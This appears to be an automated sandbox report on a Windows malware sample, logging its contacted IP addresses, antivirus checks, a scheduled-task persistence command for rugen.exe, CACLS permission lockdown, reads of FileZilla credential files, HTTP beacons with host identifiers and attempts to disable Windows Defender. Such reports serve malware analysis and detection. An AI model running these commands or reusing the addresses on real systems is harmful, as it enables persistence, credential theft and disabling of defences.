host 77.91.68.63
host 83.97.73.129
file C:\ProgramData\AVAST Software
file C:\ProgramData\Avira
file C:\ProgramData\Kaspersky Lab
file C:\ProgramData\Panda Security
file C:\ProgramData\Bitdefender
file C:\ProgramData\AVG
file C:\ProgramData\Doctor Web
Time & API Arguments Status Return Repeated

ControlService

 service_handle: 0x000000001a7dd320
service_name: None
control_code: 1
0 0

ControlService

 service_handle: 0x000000001a7dd560
service_name: None
control_code: 1
0 0
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 reg_value rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP000.TMP\"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 reg_value rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP001.TMP\"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 reg_value rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP002.TMP\"
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN rugen.exe /TR "C:\Users\test22\AppData\Local\Temp\200f691d32\rugen.exe" /F
cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN rugen.exe /TR "C:\Users\test22\AppData\Local\Temp\200f691d32\rugen.exe" /F
registry HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU\NoAutoUpdate
file C:\Users\test22\AppData\Roaming\FileZilla\sitemanager.xml
file C:\Users\test22\AppData\Roaming\FileZilla\recentservers.xml
wmi SELECT * FROM Win32_VideoController
wmi SELECT * FROM AntivirusProduct
wmi SELECT * FROM Win32_OperatingSystem
wmi SELECT * FROM Win32_Process Where SessionId='1'
wmi SELECT * FROM AntiSpyWareProduct
wmi SELECT * FROM FirewallProduct
wmi SELECT * FROM Win32_DiskDrive
wmi SELECT * FROM Win32_Processor
Time & API Arguments Status Return Repeated

RegQueryValueExW

 key_handle: 0x000002e4
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: 7-Zip 20.02 alpha
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000002e4
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Adobe AIR
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000002e4
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: EditPlus
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000002e4
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Chrome
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000002e4
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: 한컴오피스 한글 2010
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000002e4
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Mozilla Thunderbird 78.4.0 (x86 ko)
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 78.4.0 (x86 ko)\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000002e4
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Professional Plus 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Office15.PROPLUSR\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000002e4
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Adobe AIR
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000002e4
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: HttpWatch Professional 9.3.39
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000002e4
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: 한컴오피스 한글 2010
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000002e4
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Java 8 Update 131
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F32180131F0}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000002e4
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Java Auto Updater
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000002e4
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Google Update Helper
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000002e4
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Access MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0015-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000002e4
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Excel MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0016-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000002e4
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft PowerPoint MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0018-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000002e4
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Publisher MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0019-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000002e4
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Outlook MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001A-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000002e4
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Word MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001B-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000002e4
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Proofing Tools 2013 - English
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000002e4
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Outils de vérification linguistique 2013 de Microsoft Office - Français
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-040C-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000002e4
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Proofing Tools 2013 - Español
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0C0A-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000002e4
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Proofing (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-002C-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000002e4
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft InfoPath MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0044-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000002e4
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Shared MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-006E-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000002e4
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft DCF MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0090-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000002e4
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft OneNote MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00A1-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000002e4
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Groove MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00BA-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000002e4
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office OSM MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E1-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000002e4
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office OSM UX MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E2-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000002e4
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Shared Setup Metadata MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0115-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000002e4
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Access Setup Metadata MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0117-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000002e4
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Lync MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-012B-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000002e4
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Professional Plus 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{91150000-0011-0000-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000002e4
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Adobe Flash Player 13 ActiveX
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000002e4
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Adobe Flash Player 13 NPAPI
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000002e4
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Adobe Acrobat Reader DC MUI
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000002e4
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000003c4
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: 7-Zip 20.02 alpha
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000003c4
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Adobe AIR
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000003c4
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: EditPlus
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000003c4
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Chrome
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000003c4
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: 한컴오피스 한글 2010
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000003c4
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Mozilla Thunderbird 78.4.0 (x86 ko)
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 78.4.0 (x86 ko)\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000003c4
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Professional Plus 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Office15.PROPLUSR\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000003c4
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Adobe AIR
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000003c4
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: HttpWatch Professional 9.3.39
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000003c4
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: 한컴오피스 한글 2010
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000003c4
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Java 8 Update 131
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F32180131F0}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000003c4
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Java Auto Updater
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10}\DisplayName
1 0 0
Time & API Arguments Status Return Repeated

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.84&sd=2f2805&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.84&sd=2f2805&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.84&sd=2f2805&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.84&sd=2f2805&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.84&sd=2f2805&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.84&sd=2f2805&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.84&sd=2f2805&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.84&sd=2f2805&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.84&sd=2f2805&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.84&sd=2f2805&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.84&sd=2f2805&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.84&sd=2f2805&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0
cmdline CACLS "..\200f691d32" /P "test22:N"
cmdline CACLS "..\200f691d32" /P "test22:R" /E
cmdline CACLS "rugen.exe" /P "test22:N"
cmdline cmd /k echo Y|CACLS "rugen.exe" /P "test22:N"&&CACLS "rugen.exe" /P "test22:R" /E&&echo Y|CACLS "..\200f691d32" /P "test22:N"&&CACLS "..\200f691d32" /P "test22:R" /E&&Exit
cmdline CACLS "rugen.exe" /P "test22:R" /E
cmdline "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "rugen.exe" /P "test22:N"&&CACLS "rugen.exe" /P "test22:R" /E&&echo Y|CACLS "..\200f691d32" /P "test22:N"&&CACLS "..\200f691d32" /P "test22:R" /E&&Exit
description attempts to modify windows defender policies registry HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection
description attempts to modify windows defender policies registry HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable
description attempts to modify windows defender policies registry HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring
description attempts to modify windows defender policies registry HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware
description attempts to modify windows defender policies registry HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring
description attempts to modify windows defender policies registry HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection